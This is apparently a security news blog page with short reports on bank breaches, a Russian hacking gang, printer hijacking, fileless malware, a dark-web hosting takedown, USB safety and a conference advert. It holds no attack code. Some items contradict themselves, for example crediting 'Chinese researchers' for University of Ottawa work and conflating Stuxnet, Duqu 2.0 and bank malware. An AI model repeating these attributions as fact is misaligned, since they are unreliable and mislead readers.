Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

POLAND SUCCUMBS TO FINANCIAL SECURITY BREACH

(pc-Google Images)
Polish bank frantically scan their workstations and servers along with checking logs in the order to find signs of infection after noticing unusual network activity and unauthorised files on key machines within their networks. This is – by far – the most serious information security incident seen by Poland.

It turned out to be a busy week in SOCs all across Poland. About a week ago, one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise, the information was shared with other banks, who started asking their SIEMs for information. In some cases the results came back positive.

Preliminary investigation suggests that the starting point for the infection could have been located on the webserver of Polish financial sector regulatory body, Polish Financial Supervision Authority (www.knf.gov.pl). Due to a slight modification of one of the local JS files, an external JS file was loaded, which could have executed malicious payloads on selected targets.

While we have no idea of attackers motivation, so far we have no knowledge of any direct financial losses incurred by banks or their customers due to this attack. What is more troubling, some of the victims were able to identify large outgoing data transfers.

While this should not come as a surprise, this incident defines the statement “you are going to get infected”. Polish financial sector has some of the best people and tools in terms of security and still it looks like the attackers achieved their objectives to breach it without major hurdles. On the good side – they were detected and once notified banks were able to quickly identify infected machines and suspicious traffic patterns.

HACKING GANG AT LARGE FOR STEALTH

(pc-Google Images)
The hacker group in the Russian Federation, whose members are under the radar of stealing funds from accounts of Russian financial institutions, was dismantled. The Spokesman of the Ministry of Internal Affairs of the Russian Federation Irina Wolf stated.

"In May 2016, after effective interaction between the Ministry of Internal Affairs and the Federal Security Services the Russian Federation, an unprecedented interdiction operation had been carried out against the hacker group, whose members had lived in 17 different locations of the country and had been a part of misappropriation of funds from accounts of Russian financial institutions since 2013, Wolf stated in the report, published on the website of the Ministry of Internal Affairs. For the period of its activity, 50 members had managed to transfer more than 1 billion rubles."

The Spokesman of the Ministry of Internal Affairs added to her statement that other than bank accounts, attackers had also hacked critical infrastructure, including strategic industrial enterprises. 

Searches were conducted, during which computers, media devices and means of communication, as well as funded and edged weapons were seized.

"At the moment 27 organizers and participants of the group, of this 19 suspects, held criminal liable. The court had ordered their remand in custody", - the statement reflected on the website. The matter remains under investigation.

Hitachi Payment services accepts its systems were compromised

Hitachi payment Services conducted an audit regarding security breach that had compromised about 3.2 million credit cards issued by Indian banks in October 2016, after Reserve bank of India ordered an audit four months back.

The company confirmed on Thursday that their system was affected by "a sophisticated injection of malware (malicious software code)", that hampered detail of debit cards issued by banks.

Hitachi Payment Services, a firm that provides ATMs, point of sale and other services in India, said security audit firm SISA Information Security has completed its final assessment report on the breach and discovered  that the highly sophisticated malware had worked undetected and concealed its tracks during the compromise period between May 21 and July 11 , 2016.

“While the behavior of the malware and the penetration into the network has been deciphered, the amount of data ex filtrated during the above compromise period is unascertainable due to secure deletion by the malware,” said a statement released by Hitachi Payment Services.

According to the National Payments Corporation of India (NPCI), which looks at payment system in India discovered that almost 90 ATMs in the country were compromised through malware and least 641 customers across 19 banks lost Rs 1.3 crore to fraudulent transactions on their debit cards.

Loney Antony, managing director of Hitachi Payment Services said, “…we confirm that our security systems had a breach during mid-2016. As soon as the breach was discovered, we followed due process and immediately informed the RBI, National Payments Corporation of India (NPCI), banks and card schemes. We also partnered with banks to ensure the safety of their customers’ sensitive data. As a result, the extent of compromise was limited and we have not seen any further misuse due to the containment measures deployed by Hitachi Payment Services" 

Hacker hijacked more than 150,000 printers

 For many of us hacking of printers seems to be next to impossible thing. But, a hacker has hacked more than 150,000 printers via the internet.

The attack affected all kinds of printers- from home devices to shop receipt printers. The printers were hijacked and were instructed to churn out pages and print out strange messages.

The printers which were connected to the internet displayed this message on the computer screens: "Hacked. Stackoverflowin/stack the almighty, hacker god has returned to his throne, as the greatest memegod. Your printer is part of a flaming botnet. Your printer has been pwn'd."

A hacker who uses the pseudonym name Stackoverflowin, didn't have any bad intentions, as he urges the users to have better security for their printers.

He ran an automated program that scoured the internet for printers that did not have basic security controls switched on.

"It was kind of on impulse," Stack told The Register. "I had been looking into printers for a while prior to this, about a few months before. I saw multiple articles about printers and it invoked my curiosity again, and yeah, it went from there."

"I used zmap to get the IPs with the targeted ports then a small 'loader' that I coded in C to actually do the print job and send the packet," Stack told The Register. "With most of these printers you can push your own firmware to them – the firmware doesn't need to be signed."

Just before this attack,  a German academic study had found vulnerabilities in a wide range of printers.

Duqu malware’s descendant strikes over 140 organisations across the globe


The security firm, Kaspersky has a descendant of ugly malware, Stuxnet which has infected more than 140 companies, banks, government groups and telecom companies. Because infections are so hard to spot, the actual number is likely much higher.

Stuxnet was the infamous computer worm, reportedly created by US and Israel to sabotage Iran’s nuclear program seven years ago. The fileless or invisible updated malware was discovered two years ago by the Moscow-based cybersecurity company and dubbed it as ‘Duqu 2.0’, a more advanced form of the Duqu malware that was linked to Stuxnet in 2011.

The malware which is going mainstream is used by hackers to suck out money from bank accounts. The malware is in over 40 countries, including 21 instances in the United States. The trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory. “Unfortunately the use of common tools combined with different tricks makes detection very hard,” said Kaspersky.

Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Techniques like these are becoming more common, especially against relevant targets in the banking industry.

The so-called fileless malware is unique in its ability to disappear after being installed on a server. Once the attacked computer is rebooted, the malware renames itself, leaving no detectable trace of its existence. It can take several months before sysadmins realise the machine has been infected. During that time period, hackers can steal freely from the coffers of the affected enterprise. The security firm published a report about the hidden malware on Wednesday (February 08) and will present more details in April.

This discovery has given a reason for institutions to worry more about the average consumer. The new malware also follows a trend of sophisticated, undetectable cyberattacks like periscope skimming. This ultra bad technology started showing up inside of ATMs across the US last year and lets hackers gobble up credit information without the consumer or the bank knowing since the hardware is installed inside of the machine. Many banks are not adequately prepared to deal with such attacks.

Samara region protected from cyber-threatening through FinCERT

The Department of information technologies and communications of Samara region (in the Russian Federation) had tied up with the FinCERT (center for monitoring and responding to computer attacks in the financial sphere of the General Directorate of protection and information security at Bank of Russia) and have information exchange agreement, according to REGNUM News Agency.

The press conference of the regional government explained that the bilateral cooperation between Samara region and FinCERT is meant for the exchange of information on the recorded Cyber attacks and trends of development of Cyber attacks vectors on information systems.

Informational warning for authorized official about the incidents of information security, indicators of compromise the systems, and also ongoing spam mailings and attempts to introduce malicious software, is organized.

The bilateral exchange of information has allowed to share experience in combating against modern cyber threats, to improve the level of competence and development of generic scenarios of recover from information security incidents.

As previously REGNUM reported, FinCERT collected, analyzed and disseminated of information on cyber attacks, developed recommendations to reflect cyber attacks, interacted with the FSB law enforcement and operative service. Main activity of FinCERT aimed at ensuring information security of organizations of credit and financial sphere.

nullcon Information Security Conference 8Bit, Goa 2017




nullcon‍ was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero day vulnerabilities and unknown threats. Our motto - "The neXt security thing!" drives the objective of the conference i.e. to discuss and showcase the future of information security and the next-generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why the current technology is not sufficient and what should be the focus for the coming years pertaining to information security. In addition to security, one of the section of the conference called Desi Jugaad (Hindi for "Local Hack") is dedicated to hacking where we invite researchers who come up with innovative security/tech/non-tech solutions for solving real life challenges or taking up new initiatives.

The nullcon conference is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference. It is an integrated and structured platform, which caters to the needs of IT Security industry at large in a comprehensive way.

The event consists of 25 speeches and 11 training sessions, which cover all major topics of IT security industry. The conference is created for security companies/enthusiasts so they can showcase the most up to date research and technology on the topic. The shared knowledge is usually used afterwords within the organizations. Moreover, we host ExhibitionFree WorkshopsCTF Hacking competitionsJob FairBlackShield Awards and other events at the conference.

The Keynote will be addressed by Joshua Pennell, Founder & President, IOActive, following which we would have talks by various international security researchers on topics such as, ATM Hackings, Drone Hijacking, Telecom Protocol Security, Blockchain issues, Cloud Security, Bug Hunting, Social Engineering, Botnets and lots more.

With nullcon 8-bit edition we have made a lot of changes bringing the conference to the next level:
  • We anticipate to have 1000 people,
  • Additional DevOps Security Track,
  • New Trainings on Cloud Security, IoT, Infrastructure, Hardware Security,
  • New CXO Panel session,
  • Larger exhibition vendor area etc.

Nullcon Goa 2017 Dates:
  • Training - 28th Feb to 2nd March 2017
  • Conference - 3rd to 4th March 2017

New Venue:
Holiday Inn Resort, Mobor Beach, Cavelossim, Salcette, Goa - India.
Registartion is still open! Get your pass here: http://nullcon.net/website/register-goa.php

We are happy to announce that we are giving 10% discount for a conference pass if you are E Hacking News Reader! Don’t miss your chance to visit the leading Asia's Information Security Conference!

Visit our website for more information: http://nullcon.net/website/
We are looking forward to seeing you at the conference!

Anonymous hacker knocks down 20% of Dark Web’s child Pornography


A hacktivist breached the largest host of Dark web-sites, Freedom Hosting II on February 03 and took down around 10,613 .onion websites, nearly a fifth of the Dark Web for hosting child pornography.

The white-hat hacker stole 75 GB worth of files and 2.6 GB of databases, which they offered to return for 0.1 bitcoin, around $100.

Freedom Hosting II is accessible only through Tor Network and protects the user’s identity by not watching their Internet activities. The dark web was hosting an estimated 15% to 20% of all websites.

Visitors to websites running on Freedom Hosting II on February 3 saw a message explaining the hack.

“We have zero tolerance policy to child pornography,” said a hacker statement left on websites. “We do not forgive. We do not forget. You should have expected us,” added the statement.

Vigilantism is alive and well on the internet.

A few days ago, a hacker went onto the underground “dark web” and took down at least 2,000 sites hosting scam offers, political commentary and forums for child pornography.

Since most of the Dark Web is not accessible by search engines and is favored by a gamut of users ranging from libertarians and political dissidents to gunrunners, drug markets, pedophiles and sex traffickers who use Tor or set up anonymous .onion websites to hide their location and to ply their illegal trade, it becomes difficult for law enforcement to unmask the criminals seeking refuge in the shadows.

Security researcher Chris Monteiro claimed the Freedom Hosting II hack may have disrupted a substantial number of botnets, which are increasingly used by cybercriminals to launch large-scale DDoS attacks.

“I came across several child porn sites. That’s why I decided to search for an exploit and hack them,” the hacker told Newsweek. “I didn’t plan this attack, just had the right idea and took the opportunity after finding out what they were hosting,” added the hacktivist.

The European hacker, who wishes to remain anonymous, said it is the first time he has hacked anything but would do it again if there was an opportunity to target an illegal service.

Anonymous hacktivist has a carried out several campaigns against online child pornography, including Operation DarkNet in 2011 that saw 40 child porn sites hit with a distributed denial of service (DDoS) attack.

Stay protected against USB sticks


The USB (Universal Serial Bus) has become a ubiquitous storage device for consumers and businesses alike in which they store everything under the sun-work files to personal clicks. Businesses often count on USB’s as a quick and easy back up tool for company data and applications.
But this easy access and widespread usage is a major source of shipping ransomware and malware into systems. For a long time, security researchers have been warning individuals and business establishments against the usage of USB sticks for transfer of sensitive data yet individuals and owners have paid no heed to their warnings.

Because of a USB’s small size, it is easy to drop or misplace which will serve as an opportunity for scammers to scoop up as many orphaned USB’s as possible to use the data on them for identity theft and other schemes.

Hackers also intentionally drop USBs in public areas, so that if anyone picks it up and uses on their computer, they can be attacked.

The malware is also transferred when a USB is plugged into a system.

Last month, North Korean defectors successfully shipped in "several thousand" USB sticks containing banned content like South Korean soaps, Hollywood films, and global news. While this transfer was not dangerous enough, there are many others which can compromise the privacy and credentials of individuals and businesses.

The same month also saw the transfer of Spora ransomware which spread itself via highly sophisticated manner.It had implemented encryption procedures that do not need a command and control server, a user-friendly payment site, choice of different packages that victims can opt for including immunity from future attacks and ransomware-as-a-service capability.

It's high time people that people understand that storing sensitive data on an unencrypted USB can prove disastrous, both financially and emotionally.There are a number of USB’s that offer encryption options and that sensitive data should be stored in them physically secured in home or office and should never be carried out of the building.For other non-sensitive data, another USB can be carried for trips or offsite meetings.

The best practice to stay protected also involves to not use USB of anyone else, even if you know the person because their USB can be pre-infected with a malware and it's everyone's interest to not share your USB.

Let the anti-virus and anti-malware applications thoroughly scan all the external storage devices and be sure to diable the auto-run feature on your system which will protect you against automatic loading of of malware files. It's best to stay cautious than to suffer.

Researchers’ find way to protect quantum computing networks from hacking

Chinese researchers have discovered the way to protect quantum computing networks from external attacks. They have managed to  build “the first high-dimensional quantum cloning machine capable of performing quantum hacking to intercept a secure quantum message.”

University of Ottawa researchers has published their research in the journal Science Advances which explained that both traditional, and non-traditional computers, which uses quantum computing are vulnerable to hacking.

Ebrahim Karimi from the University of Ottawa, Canada, said, "Our team has built the first high-dimensional quantum cloning machine capable of performing quantum hacking to intercept a secure quantum message."

"Once we were able to analyze the results, we discovered some very important clues to help protect quantum computing networks against potential hacking threats," added Karimi, who holds the Canada Research Chair in Structured Light.

Until now Quantum systems were believed to be perfectly secure for data transmission, but after this research, it had raised questions.

"What we found was that when larger amounts of quantum information are encoded on a single photon, the copies will get worse and hacking even simpler to detect," added Frederic Bouchard a University of Ottawa doctoral student.

"We showed that cloning attacks introduce specific, observable noises in a secure quantum communication channel. Ensuring photons contain the largest amount of information possible and monitoring these noises in a secure channel should help strengthen quantum computing networks against potential hacking threats," Bouchard added.

Darknet follows bug bounty lead

Closed networks are not solely hotbeds of crime and depravity, now darknet marketplace too hopes on putting bounties on bugs which can help improve security for its clientele.

Dark net black markets are turning to bounty hunters to find security flaws in their systems. Hansa Market is one of them where anonymity is prized and exposure can lead to jail time. To keep its customers out of trouble, Hansa, a popular darknet marketplace for selling illicit goods, is following legitimate businesses by paying researchers for reporting security flaws.

According to CyberScoop, the marketplace, which brought in $3 million last year, has launched a bug bounty program offering rewards worth up to 10 BTC or around $10,000. The biggest bounty worth 10k is reserved for "vulnerabilities that could severely disrupt HANSA's integrity."

Considering marketplaces like Hansa sell drugs, illegal firearms, log-ins and other data, the websites likely want to amp up their security measures to protect their sellers from law enforcement. They also likely want to protect all the log-in/password dumps and other data for sale from other hackers who might break into their system to steal them. Last week, Hansa announced on Reddit that it had launched a bitcoin bug bounty to keep clients safe.

Companies frequently create private networks to enable employees to use secure corporate servers, for example. And free software allows individuals to create what are called “peer-to-peer” networks, connecting directly from one machine to another.

Unable to be indexed by current search engines, and therefore less visible to the general public, subnetworks like these are often called “darknets,” or collective as the singular “darknet.” These networks typically use software, such as Tor that anonymizes the machines connecting to them, and encrypts the data travelling through their connections.

Bug bounties are gaining in popularity in the world of legitimate business as a means of improving product security.

However, Sarah Jamie Lewis, a privacy researcher who worked on Dark Web security tool OnionScan, doesn't believe bug bounty programs could help dark net websites much because she believes that bug bounties are only a patch, we really need new privacy-oriented software stacks, servers, blog platforms, etc.

And some of what is on the darknet is alarming.

“Perusing the darknet offers a jarring jaunt through jaw-dropping depravity: Galleries of child pornography, videos of humans having sex with animals, offers FOR SALE of illegal drugs, weapons, stolen credit card numbers and fake identifications for sale. Even human organs reportedly from Chinese execution victims are up for sale on the darknet,” read a story from Fox News.

But portraying the darknet as primarily, or even solely, for criminals ignores the societal forces that push people toward these anonymous networks. One major darknet, called Freenet, indicates that darknets should be understood not as a crime-ridden “Wild West,” but rather as “wilderness,” spaces that by design are meant to remain unsullied by the civilising institutions—law enforcement, governments and corporations—that have come to dominate the internet.